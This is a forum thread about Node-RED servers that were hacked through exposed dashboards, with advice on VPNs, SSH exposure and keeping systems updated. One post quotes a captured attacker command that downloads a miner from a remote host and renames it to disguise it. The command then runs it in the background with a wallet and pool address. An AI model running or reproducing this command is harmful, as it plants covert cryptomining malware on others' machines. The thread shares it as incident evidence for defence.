Dashboard suddenly asks for password (Hacked Node-RED servers)

They are good for people with limited experience of security and networking but who need remote access to their environment.

I use something on my own service too. The difference being that I leave it turned off normally and only turn it on when I (rarely) need it.

Which is good for those people who have the knowledge and the time to set it up properly. The cloud services provide generally strong security (with both the caveats about (a) trusting the vendor, (b) making sure that remote devices and networking are not compromised).

And that is an important point. You don't need to expose a web endpoint if all you need is a simple switch or two and some simple data responses.

You think you SOLVED a problem with that?! When this thread is all about preventing cyber attacks on Node-RED systems?!!!!! You are doing the opposite.

I'm not actually convinced that those attackers got in via SSH, there are easier attacks if you have the tools. But the reason for moving the port is to stop simple port scans. The automated scans that start a few seconds after you expose a device to the Internet. Moving to a non-standard port stops the majority of those and when I last tried, it killed off 99%+ of all SSH attacks on my systems (a couple of VPS's so they were always going to be Internet facing).

I agree with the comment that it is best not to expose SSH at all if you can help it. Indeed, the best security is no exposure at all Just not terribly practical sometimes.

Haha, even I won't do that!

I refer everyone back to the FAQ thread on security that I referenced earlier.

If you really think you need to expose a web endpoint, you have to accept there are risks and you need to prepare for them. Preparing isn't necessarily that hard but it is detailed work that you need to do carefully step by step. If you are not prepared to take the time or don't have the time, please do us all a favour - don't expose to the internet. Cyber failures don't just impact you, successful attacks often lead to systems being used to attack others.

Security starts by not making assumptions. For example, if you are using a Raspberry Pi, you probably just launch straight in and use the Pi user and group and maybe do the passwordless sudo thing that I objected to above - sure, we all do that! But once you start considering other people accessing your system, you would be better off creating a new install and making it secure from scratch - well before even starting to layer the additional services and node-red configuration changes required.

It is also a reasonable (not terrible) amount of ongoing work to keep a system secure. Again, if you aren't prepared to do that, don't even start please. You need to be regularly updating all of your software and keeping an eye out for improvements you need to make such as better logging and alerting. I tend to use an auto-update service on Linux devices so I don't have to think about updates too much. That might break things occasionally but better than being exposed unknowingly by out-of-date software.

You're right, on my side thy downloaded an ip2.sh script and run it. I think it is an test how powerful the machine is, even the wallet is visible here:

mkdir -p /tmp/run/1/101/23/65/36 &&cd /tmp/run/1/101/23/65/36 && rm -rf nanominer-linux-3.6.8.tar.gz&& wget http://xx.xx.xx.xxx:26/nanominer-linux-3.6.8.tar.gz && tar xzvf nanominer-linux-3.6.8.tar.gz && cd nanominer-linux-3.6.8 && mv nanominer python&& nohup ./python -algo verushash -pool1 dg4.dnslook.ga:3300 -wallet TL8914yZncYAriHHgaak6w8pNy4dRf8T88.$(echo $(wget -q -O - ifconfig.me)|sed -e 's/\.//g') -password c=TRX >/dev/null 2>&1 &

I even saw an small peak here, but not for an long time, so it was an test imho:

grafik1579×878 44 KB

But if they run the commands through NR, how comes it,that they appear in my local command history?

That's a good question. I don't think commands run via the exec node are recorded in .bash_history.
One person posted above that a Terminal link was added to their Node-red dropdown menu.

My only reason to assume it was related to cryptomining is the name "nanominer" but the name may well be intended to deceive. We know that other binary files were downloaded too.
So the spike in activity might just be while your Pi was set up as part of their bot net and it's then passively waiting for further instructions.

Just to add my little contribution, I have quite many services running Node-RED, Homeassistant, etc. all unprotected within the LAN, BUT:

The only way to get to them in through Softether VPN (quite easy to install) running on my Pi with port 5555 open on the router.

• Identification from my laptop is done with the Softether client (no password, but PKI certificate).

• Identification from my phone is done through OpenVPN also with a different PKI certificate. Softether makes easy to export an OpenVPN profile for your phone.

I know it is not easy therefore to give access to friends or family but I find it a quite secure setup (which in that case you are trusting the Softether software, for good or bad).

You can setup your own VPN server behind the firewall or NAT in your company, and you can reach to that VPN server in the corporate private network from your home or mobile place, without any modification of firewall settings. Any deep-packet inspection firewalls cannot detect SoftEther VPN's transport packets as a VPN tunnel, because SoftEther VPN uses Ethernet over HTTPS for camouflage.

OMG! I can't believe they are effectively encouraging people to set up an uncontrolled entry point into corporate networks! If anyone tried that in any organisation I've ever worked with, they would be instantly sacked.

I don't understand. How do you imply I suggested such a terrible action? Or is it in the Softether website?

... it's from the softether.org website

Sorry, my bad for not writing that more clearly.

This topic was automatically closed 30 days after the last reply. New replies are no longer allowed.